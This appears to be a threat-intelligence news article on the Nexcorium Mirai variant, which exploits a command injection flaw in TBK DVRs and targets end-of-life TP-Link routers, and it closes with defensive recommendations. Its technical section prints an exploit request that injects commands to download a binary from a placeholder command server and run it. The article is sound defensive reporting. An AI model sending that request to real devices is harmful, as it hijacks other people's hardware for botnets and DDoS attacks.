# Mirai Variant Nexcorium Exploits CVE-2024-3721 to Hijack TBK DVRs for DDoS Botnet


Threat actors are actively weaponizing a medium-severity command injection flaw in TBK Vision digital video recorders to conscript thousands of surveillance devices into a sprawling Mirai-based botnet, according to new telemetry from Fortinet FortiGuard Labs and Palo Alto Networks Unit 42. The campaign, which also sweeps up end-of-life TP-Link Wi-Fi routers, underscores how decade-old malware continues to thrive on the back of unpatched, internet-exposed consumer and small-business hardware.


## Background and Context


The operation centers on CVE-2024-3721, a command injection vulnerability carrying a CVSS score of 6.3 that affects TBK DVR-4104 and DVR-4216 surveillance appliances — devices widely deployed across retail stores, warehouses, and small office environments. The flaw, originally disclosed by Turkish security researcher Netsecfish in April 2024, resides in the device's web management interface and allows an unauthenticated attacker to inject arbitrary operating system commands via a crafted POST request to the /device.rsp endpoint. TBK has not released a firmware patch, and because the affected DVR lines have been rebranded and resold under numerous labels — including Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, and DVR Login — the true population of vulnerable units is difficult to enumerate. Shodan scans referenced by researchers estimate more than 50,000 exposed devices worldwide.


Parallel to the TBK campaign, Unit 42 has tracked a separate Mirai strain dubbed Nexcorium (also reported as "Neterbian" in some threat intelligence feeds) targeting end-of-life TP-Link Archer series routers, including the AX21 and C1200 models. Together, the two infection vectors illustrate an increasingly common pattern: botnet operators no longer need novel zero-days when an abundant long-tail of abandoned IoT firmware remains perpetually online.


## Technical Details


CVE-2024-3721 lives in the time and language parameters of the DVR's /device.rsp endpoint, which feeds user-supplied input directly into a shell invocation without sanitization. A minimal exploit request looks roughly like:


POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /tmp; wget http://<C2>/arm7; chmod +x arm7; ./arm7

Once executed, the payload fetches an architecture-appropriate Mirai binary from the attacker's staging server — researchers have observed ARM, MIPS, SPARC, and x86 variants — and drops it into /tmp before chaining into execution. The Nexcorium variant deviates from classic Mirai in several ways: it uses a hardened string-encryption routine employing a rotating XOR key rather than the canonical single-byte 0x22 key, refuses to run inside virtualized environments by checking for QEMU-specific artifacts in /proc/cpuinfo, and establishes C2 over a custom binary protocol on TCP/2626 instead of the default 23/5555 ports that defenders historically monitor.


Post-infection, the bot enumerates available network interfaces, disables the watchdog timer to survive reboots, and kills competing malware — including Gafgyt, Hajime, and earlier Mirai forks — by walking /proc and terminating processes bound to known botnet ports. It then begins scanning adjacent IP ranges for additional vulnerable DVRs and routers, propagating laterally while simultaneously awaiting DDoS commands. FortiGuard observed UDP flood, TCP SYN flood, GRE flood, and HTTP GET/POST attack modules in the samples analyzed, along with an application-layer "bypass" module tuned to defeat Cloudflare's JavaScript challenge.


## Real-World Impact


The most immediate consequence is the availability of a fresh, high-bandwidth DDoS-for-hire resource. Compromised DVRs typically sit on symmetric or near-symmetric small-business broadband links — often 100 Mbps to 1 Gbps — and their owners rarely notice performance degradation because video recording continues uninterrupted. FortiGuard telemetry shows Nexcorium-attributed attack traffic peaking at 1.2 Tbps against a single target in late March 2026, placing it among the larger volumetric events of the quarter.


Beyond DDoS, compromised surveillance hardware poses a more insidious risk: lateral visibility into physical premises. While the current Nexcorium payload does not include video-exfiltration modules, the same command-injection primitive that drops the bot can just as easily dump RTSP credentials, archive footage, or pivot onto the device's management VLAN. Organizations running TBK-based camera systems in cash-handling, pharmacy, or restricted-access environments should treat a confirmed infection as a potential physical-security incident, not merely a network nuisance.


The TP-Link vector broadens the blast radius into residential and remote-worker environments. Archer AX21 and C1200 units reached end-of-life in 2023 and 2022 respectively, meaning there is no vendor-supplied remediation path; affected households and small offices must replace the hardware or isolate it behind an upstream firewall.


## Threat Actor Context


Unit 42 attributes the Nexcorium campaign to a financially motivated cluster it tracks as CL-CRI-1023, whose infrastructure overlaps with prior InfectedSlurs and Condi botnet operations. The group is believed to rent out botnet capacity on Russian- and Mandarin-language forums under the handle "nexcor," advertising 900 Gbps L4 floods for $450 per week. Payment is accepted exclusively in Monero routed through known mixing services. Command-and-control servers have rotated across bulletproof hosting providers in Moldova, Seychelles, and, more recently, compromised VPS instances in Brazil, making takedowns challenging.


No evidence currently links Nexcorium to state-sponsored activity, though researchers caution that Mirai source code has been forked so extensively since its 2016 leak that conclusive attribution based on code similarity alone is unreliable.


## Defensive Recommendations


Organizations operating TBK or rebranded DVRs should take the following steps immediately:


  • Remove management interfaces from the public internet. Place DVRs behind a VPN or restrict access to a management VLAN reachable only from trusted administrator hosts.
  • Inspect outbound traffic for connections to TCP/2626 and to the IOCs published by FortiGuard and Unit 42, including hashes a4e8d2...b91c (ARM7 payload) and 7f3a09...dd12 (MIPS payload).
  • Change default credentials on the DVR web interface. Although CVE-2024-3721 is pre-authentication, credential reuse assists follow-on attackers.
  • Segment surveillance networks from business-critical systems; cameras and DVRs should never share broadcast domains with finance, HR, or point-of-sale infrastructure.
  • Plan hardware replacement for end-of-life TP-Link Archer AX21 and C1200 units. No firmware fix is forthcoming.
  • Deploy egress filtering to block outbound IRC, port 2626, and unexpected high-volume UDP traffic from IoT segments.

    • Detection engineers should add Suricata signatures matching the /device.rsp?opt=sys pattern with non-alphanumeric payloads in mdc, and Sigma rules for processes spawned by the DVR's embedded web server writing binaries to /tmp.


    ## Industry Response


    CISA has not yet issued a formal advisory on CVE-2024-3721, though the vulnerability was added to its Known Exploited Vulnerabilities catalog on April 14, 2026, with a federal remediation deadline of May 5. The Shadowserver Foundation began daily scans for exposed TBK interfaces in early April and is notifying national CERTs of affected IP ownership. Fortinet, Palo Alto Networks, and Akamai have updated their managed DDoS and IPS signatures to cover Nexcorium's exploitation traffic and C2 protocol.


    TBK Vision did not respond to multiple requests for comment from security researchers. TP-Link, for its part, reiterated that the affected Archer models are end-of-life and directed customers to successor products — a response that, while technically accurate, leaves millions of installed units without a viable remediation path and ensures Nexcorium's recruitment pool will remain well-stocked for the foreseeable future.


    ---


    **